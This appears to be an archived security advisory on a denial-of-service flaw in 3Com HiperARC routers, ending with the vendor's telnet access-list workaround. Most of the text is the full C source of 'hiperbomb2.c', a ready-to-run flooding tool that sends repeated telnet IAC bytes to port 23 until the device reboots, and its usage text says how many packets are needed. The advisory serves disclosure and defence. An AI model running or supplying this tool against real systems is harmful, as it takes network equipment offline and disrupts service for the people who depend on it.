COMMAND
3COM HiperARC
SYSTEMS AFFECTED
3COM HiperARC 4.0...4.2.29
PROBLEM
Jonathan Chapman found following. The program below will reboot
a 3com HiperARC. By flooding the telnet port of a 3com HiperARC
using the provided program, the HiperARC unconditionally reboots.
This program is effective over all interfaces, including a dialup.
/* ---------------------------------------------------------------------
* hiperbomb2.c - Reboots HiperARC faster.
* ---------------------------------------------------------------------
* (c) 1999 - Jonathan Chapman <jchapman@1st.net>
* ---------------------------------------------------------------------
* Sends a high volume of IACs which eventually leads to a reboot of the
* HiperARC. Brief testing indicated that this problem is most likely
* specific to sending IACs rather than any other type of data. Further
* research has shown that specific IAC patterns are more likely to cause
* a reboot. In this example I use one of the most efficient combinations
* I have discovered. Through my testing it usually required at least
* 60,000 packets to cause the HiperARC to reboot.
* ---------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
char *chassis;
int sockfd, num_of_tries;
void connect_to_chassis(char *name)
{
struct hostent *host;
struct sockaddr_in remote;
host = gethostbyname(name);
if(!host) {
fprintf(stderr, "Cannot resolve host %s.\n", name);
exit(3);
}
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if(sockfd < 0) {
fprintf(stderr, "Cannot obtain descriptor.\n");
exit(4);
}
remote.sin_family = AF_INET;
remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
remote.sin_port = htons(23);
connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));
return;
}
void send_iacs()
{
unsigned char reply[3] = {254, 36, 185};
unsigned int k;
for(k = 0; k < num_of_tries; k++) {
write(sockfd, reply, 3);
}
}
int main(int ac, char **av)
{
if(ac < 3) {
fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
exit(2);
}
chassis = av[1];
num_of_tries = atoi(av[2]);
fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
chassis, num_of_tries);
connect_to_chassis(chassis);
send_iacs();
fprintf(stderr, "Attack complete.\n");
exit(0);
}
This has been confirmed on 3Com Corporation HiPer Access Router
Card Built on Feb 16 1999 at 12:42:34. System Version: V4.1.59.
SOLUTION
3Com acknowledges and has verified the existence of the hiperbomb
DOS attack. All HiPer ARC software (4.0 - 4.2.29) is vulnerable
to the attack. The following workaround will protect your
equipment until the software patch becomes available. Defect is
logged under 3Com MR#11022. It is possible to add a telnet
access list of trusted hosts on the HiPer ARC. It can be assumed
that the attack will not come from a trusted host. It is also
recommended that you do no allow any telnet sessions from outside
your network. To add a telnet access list:
1) add telnet clients. These clients may be individual hosts or networks.
"ADD TELNET CLIENT X.X.X.X"
"LIST TELNET CLIENTS" will list all configured clients
2) Enable the telnet client access list feature.
"ENABLE TELNET CLIENT_ACCESS"